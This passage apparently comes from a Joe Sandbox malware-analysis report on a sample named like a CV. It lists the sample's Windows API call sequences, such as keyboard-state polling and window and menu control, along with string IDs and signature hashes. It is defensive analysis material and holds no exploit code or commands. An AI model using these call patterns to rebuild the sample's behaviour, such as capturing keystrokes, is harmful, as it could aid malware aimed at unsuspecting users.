                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: SendString
                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                            • API String ID: 890592661-1007645807
                                                                                            • Opcode ID: 1082c9e6a96dff058ea6afc65a9770a373feddc440166ca7905301c3116505a2
                                                                                            • Instruction ID: 569fb6808b4c2c7f6428dec1f21bc2a3e45d45e503c1b7a7bf6bce5fd1fcd6dc
                                                                                            • Opcode Fuzzy Hash: 1082c9e6a96dff058ea6afc65a9770a373feddc440166ca7905301c3116505a2
                                                                                            • Instruction Fuzzy Hash: ED11C4B1A5026979D724B3A1CC4AEFF7A7CEB91B00F00051DB425A20D2EFA05A45C5B0
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 00107794
                                                                                              • Part of subcall function 000DDC38: timeGetTime.WINMM(?,75A8B400,001358AB), ref: 000DDC3C
                                                                                            • Sleep.KERNEL32(0000000A), ref: 001077C0
                                                                                            • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 001077E4
                                                                                            • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00107806
                                                                                            • SetActiveWindow.USER32 ref: 00107825
                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00107833
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00107852
                                                                                            • Sleep.KERNEL32(000000FA), ref: 0010785D
                                                                                            • IsWindow.USER32 ref: 00107869
                                                                                            • EndDialog.USER32(00000000), ref: 0010787A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                            • String ID: BUTTON
                                                                                            • API String ID: 1194449130-3405671355
                                                                                            • Opcode ID: 4d24fb3dbc7ae2ba3d53db71ffd74068396d596e55626a5f0854f98b38a24d66
                                                                                            • Instruction ID: 82834fc20d17442932ec9bd5cc7a52e6c3eea6a8ed4cb5ecf38a719598b7478b
                                                                                            • Opcode Fuzzy Hash: 4d24fb3dbc7ae2ba3d53db71ffd74068396d596e55626a5f0854f98b38a24d66
                                                                                            • Instruction Fuzzy Hash: AC219374604205AFEB115B60FC9DB267F3AFB45B88F094015F955829F2DFB16E84DB20
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CoInitialize.OLE32(00000000), ref: 0011034B
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001103DE
                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 001103F2
                                                                                            • CoCreateInstance.OLE32(0014DA8C,00000000,00000001,00173CF8,?), ref: 0011043E
                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001104AD
                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00110505
                                                                                            • _memset.LIBCMT ref: 00110542
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0011057E
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001105A1
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 001105A8
                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 001105DF
                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 001105E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                            • String ID:
                                                                                            • API String ID: 1246142700-0
                                                                                            • Opcode ID: 27c8da72c39a0fc4366ba2265e177978f1cca5f593cbcd968e6b4b09f6f1bd89
                                                                                            • Instruction ID: ee8637ab5909ba3a2c1e0d4fcc7771b584df58c40e3e06395af7002f5ca760e8
                                                                                            • Opcode Fuzzy Hash: 27c8da72c39a0fc4366ba2265e177978f1cca5f593cbcd968e6b4b09f6f1bd89
                                                                                            • Instruction Fuzzy Hash: 8AB1DA75A00209AFDB05DFA4D889DAEBBB9FF48304B148469F905EB261DB70ED81CF50
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00102ED6
                                                                                            • SetKeyboardState.USER32(?), ref: 00102F41
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00102F61
                                                                                            • GetKeyState.USER32(000000A0), ref: 00102F78
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00102FA7
                                                                                            • GetKeyState.USER32(000000A1), ref: 00102FB8
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00102FE4
                                                                                            • GetKeyState.USER32(00000011), ref: 00102FF2
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0010301B
                                                                                            • GetKeyState.USER32(00000012), ref: 00103029
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00103052
                                                                                            • GetKeyState.USER32(0000005B), ref: 00103060
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            • Opcode ID: 2f270b47564f6cbdadfd9a8a8e63a8deb9769807b0620d60d3631ea9b74f1535
                                                                                            • Instruction ID: 9cd48eedb48a1fdcd26f25f079c916adde8be027d846a1e26b25e0b4a3c92c94
                                                                                            • Opcode Fuzzy Hash: 2f270b47564f6cbdadfd9a8a8e63a8deb9769807b0620d60d3631ea9b74f1535
                                                                                            • Instruction Fuzzy Hash: 0B51D974A0478829FB35EBA488547EABFF85F11380F08859DD5C25B1C2DBE4AB8CC761
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 000FED1E
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FED30
                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000FED8E
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 000FED99
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FEDAB
                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000FEE01
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 000FEE0F
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 000FEE20
                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000FEE63
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 000FEE71
                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000FEE8E
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 000FEE9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                            • String ID:
                                                                                            • API String ID: 3096461208-0
                                                                                            • Opcode ID: ca7fc49e45311455b0297ae045f51a199c353491ce7f6cc2d555f2a922232511
                                                                                            • Instruction ID: 4dba7d9539884c126452b5fbff23bb9a251d7e7f762336b4098c729b8aab6f32
                                                                                            • Opcode Fuzzy Hash: ca7fc49e45311455b0297ae045f51a199c353491ce7f6cc2d555f2a922232511
                                                                                            • Instruction Fuzzy Hash: 2D5122B5B00209AFDF18CF68DD85AAEBBB6EB88710F158129F619D76A0D7709D40CB10
                                                                                            APIs
                                                                                              • Part of subcall function 000DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000DB759,?,00000000,?,?,?,?,000DB72B,00000000,?), ref: 000DBA58
                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000DB72B), ref: 000DB7F6
                                                                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 000DB88D
                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0013D8A6
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D8D7
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D8EE
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000DB72B,00000000,?,?,000DB2EF,?,?), ref: 0013D90A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0013D91C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 641708696-0
                                                                                            • Opcode ID: 8e4aec361ef165a44dc998cc6df9454668be1c031da515f26831ec4e215a2c7a
                                                                                            • Instruction ID: a6a7e807fabc8e30e4ad259e7ca0c12001643e8b4c09c48ea5b86c221a2e8597
                                                                                            • Opcode Fuzzy Hash: 8e4aec361ef165a44dc998cc6df9454668be1c031da515f26831ec4e215a2c7a
                                                                                            • Instruction Fuzzy Hash: 0D616831500700EFDB359F18E988B69B7F9FF95316F26051AE48686A70DBB0A9C1DB60
                                                                                            APIs
                                                                                              • Part of subcall function 000DB526: GetWindowLongW.USER32(?,000000EB), ref: 000DB537
                                                                                            • GetSysColor.USER32(0000000F), ref: 000DB438
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 259745315-0
                                                                                            • Opcode ID: 417c6dbd28c8537fdd01813d09daa715f5556dac8fe42305063033bf52b8dd1a
                                                                                            • Instruction ID: 48a22916a5513c5ab20d8c8dae6fb12a4b535498d24b7774da8b1c3432eb7167
                                                                                            • Opcode Fuzzy Hash: 417c6dbd28c8537fdd01813d09daa715f5556dac8fe42305063033bf52b8dd1a
                                                                                            • Instruction Fuzzy Hash: 2241C335000240EFDF259F28E889BB93BA5AB06730F554262FD658E6E6D7308D81DB31
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                            • String ID:
                                                                                            • API String ID: 136442275-0
                                                                                            • Opcode ID: 5b2df767d03be660696161f2ecaf33a2ea2b45420823c8443f288cac79b1502d
                                                                                            • Instruction ID: 7c63a772a4dc20ac7e67701f3d3f5298c1da00e4db002116c082d43b3345ed65
                                                                                            • Opcode Fuzzy Hash: 5b2df767d03be660696161f2ecaf33a2ea2b45420823c8443f288cac79b1502d
                                                                                            • Instruction Fuzzy Hash: 58413B7694515CAECF61EB90CC45DCB73BDEB44300F1041A2B699B2092EBB0ABE98F50
                                                                                            APIs
                                                                                            • CharLowerBuffW.USER32(0015DC00,0015DC00,0015DC00), ref: 0010D7CE
                                                                                            • GetDriveTypeW.KERNEL32(?,00173A70,00000061), ref: 0010D898
                                                                                            • _wcscpy.LIBCMT ref: 0010D8C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                            • API String ID: 2820617543-1000479233
                                                                                            • Opcode ID: a56d83b3680bc9f1aa9cb6f2624b18f63fa6a2fbf19cef60975f4972d37fd6f1
                                                                                            • Instruction ID: be2c6f245a5025f4299cb4a1d5156638c5b0771e79e5ebf7c7ae12d5f4b79065
                                                                                            • Opcode Fuzzy Hash: a56d83b3680bc9f1aa9cb6f2624b18f63fa6a2fbf19cef60975f4972d37fd6f1
                                                                                            • Instruction Fuzzy Hash: 09519135104340AFC704EF54E892AAEB7A5EF94314F50C82EF5EA5B2E2EB71DD05CA52
                                                                                            APIs
                                                                                            • __swprintf.LIBCMT ref: 000C93AB
                                                                                            • __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000E1557: _xtow@16.LIBCMT ref: 000E1578
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf_xtow@16
                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                            • API String ID: 1502193981-2263619337
                                                                                            • Opcode ID: 5e5b25d3fbc032e4571bb93fc4be19aac3177eb9e56c801bd6c0385bdeb6c51c
                                                                                            • Instruction ID: 9c6472435688d7d3580c105af19267fa28b7c16fcc41cd0ecb3bf6a4324fc9ca
                                                                                            • Opcode Fuzzy Hash: 5e5b25d3fbc032e4571bb93fc4be19aac3177eb9e56c801bd6c0385bdeb6c51c
                                                                                            • Instruction Fuzzy Hash: 5041B072504205EFEB24DB64D946FAEB7F8EB48300F24446EE14AD72D2EB31AA41DB10
                                                                                            APIs
                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0012A259
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0012A260
                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0012A273
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012A27B
                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0012A286
                                                                                            • DeleteDC.GDI32(00000000), ref: 0012A28F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0012A299
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0012A2AD
                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0012A2B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                            • String ID: static
                                                                                            • API String ID: 2559357485-2160076837
                                                                                            • Opcode ID: a9edc88e6e8b46ac9d33131a0c3564a2d68ee733e69f25bead6a35434bc9e8e4
                                                                                            • Instruction ID: 568697cc56d015611109641e51c524c91747268e52d723396ac758f3956b936a
                                                                                            • Opcode Fuzzy Hash: a9edc88e6e8b46ac9d33131a0c3564a2d68ee733e69f25bead6a35434bc9e8e4
                                                                                            • Instruction Fuzzy Hash: F0319C35100224FBDF219FA4EC49FEA3B69FF1E760F110215FA19A60A0D731D861DBA5
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                            • String ID: 0.0.0.0
                                                                                            • API String ID: 2620052-3771769585
                                                                                            • Opcode ID: fc2966e502dced32c7ebce79e91a7ad362541b1f953ca55f24dea6a65cb3a51a
                                                                                            • Instruction ID: 6e4b8ce0bd30f7c1b3d02b46a1b7d5a29a20ea6e0d23f27ecfba6d73c30fd3ef
                                                                                            • Opcode Fuzzy Hash: fc2966e502dced32c7ebce79e91a7ad362541b1f953ca55f24dea6a65cb3a51a
                                                                                            • Instruction Fuzzy Hash: B0112771504206AFCB24AB70AC09EDA77ACEF41711F000065F145A60D1EFF09EC08750
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000E5047
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __gmtime64_s.LIBCMT ref: 000E50E0
                                                                                            • __gmtime64_s.LIBCMT ref: 000E5116
                                                                                            • __gmtime64_s.LIBCMT ref: 000E5133
                                                                                            • __allrem.LIBCMT ref: 000E5189
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E51A5
                                                                                            • __allrem.LIBCMT ref: 000E51BC
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E51DA
                                                                                            • __allrem.LIBCMT ref: 000E51F1
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E520F
                                                                                            • __invoke_watson.LIBCMT ref: 000E5280
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                            • String ID:
                                                                                            • API String ID: 384356119-0
                                                                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                            • Instruction ID: cfba754576692f506d0b7205c89370ef551967070ca2a8ddb58018e73b44a973
                                                                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                            • Instruction Fuzzy Hash: 9B71F971A00B57AFD7149E7ACC41BAAB3E8AF05369F14462EF614F7682E770D94087D0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00104DF8
                                                                                            • GetMenuItemInfoW.USER32(00181708,000000FF,00000000,00000030), ref: 00104E59
                                                                                            • SetMenuItemInfoW.USER32(00181708,00000004,00000000,00000030), ref: 00104E8F
                                                                                            • Sleep.KERNEL32(000001F4), ref: 00104EA1
                                                                                            • GetMenuItemCount.USER32(?), ref: 00104EE5
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00104F01
                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00104F2B
                                                                                            • GetMenuItemID.USER32(?,?), ref: 00104F70
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00104FB6
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104FCA
                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00104FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                            • String ID:
                                                                                            • API String ID: 4176008265-0
                                                                                            • Opcode ID: f02c18b04b00e65672891b749a40b5c35f36f6948d9ea6c8364fe993714438cc
                                                                                            • Instruction ID: f1c7a679884b36324addac205e1e3200309e61454b6c8f6c09ff598cfc314bf5
